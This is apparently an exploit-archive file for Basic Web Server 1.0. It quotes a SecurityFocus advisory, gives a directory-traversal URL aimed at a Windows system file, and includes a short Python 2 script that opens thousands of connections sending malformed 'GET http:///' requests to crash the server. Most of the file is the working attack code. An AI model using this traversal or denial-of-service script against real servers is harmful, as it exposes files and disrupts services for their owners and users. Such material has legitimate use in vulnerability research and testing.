39 lines
No EOL
1.1 KiB
Python
Executable file
39 lines
No EOL
1.1 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/43356/info
|
|
|
|
Basic Web Server is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.
|
|
|
|
Exploiting these issues will allow attackers to obtain sensitive information or cause denial-of-service conditions.
|
|
|
|
Basic Web Server 1.0 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/?../../../../../../../../../../windows/win.
|
|
|
|
import socket
|
|
|
|
host = 'localhost'
|
|
port = 80
|
|
|
|
include_file = True
|
|
complete_path = True
|
|
|
|
try:
|
|
for i in range(0, 1024):
|
|
|
|
for x in range(0, 8):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host, port))
|
|
s.settimeout(2)
|
|
s.send('GET http:/// HTTP/1.1\r\n'
|
|
'Host: ' + host + '\r\n\r\n')
|
|
print '.',
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host, port))
|
|
s.settimeout(2)
|
|
s.send('GET / HTTP/1.1\r\n'
|
|
'Host: ' + host + '\r\n\r\n')
|
|
s.recv(8192)
|
|
|
|
print 'response received'
|
|
except:
|
|
print 'error contacting server' |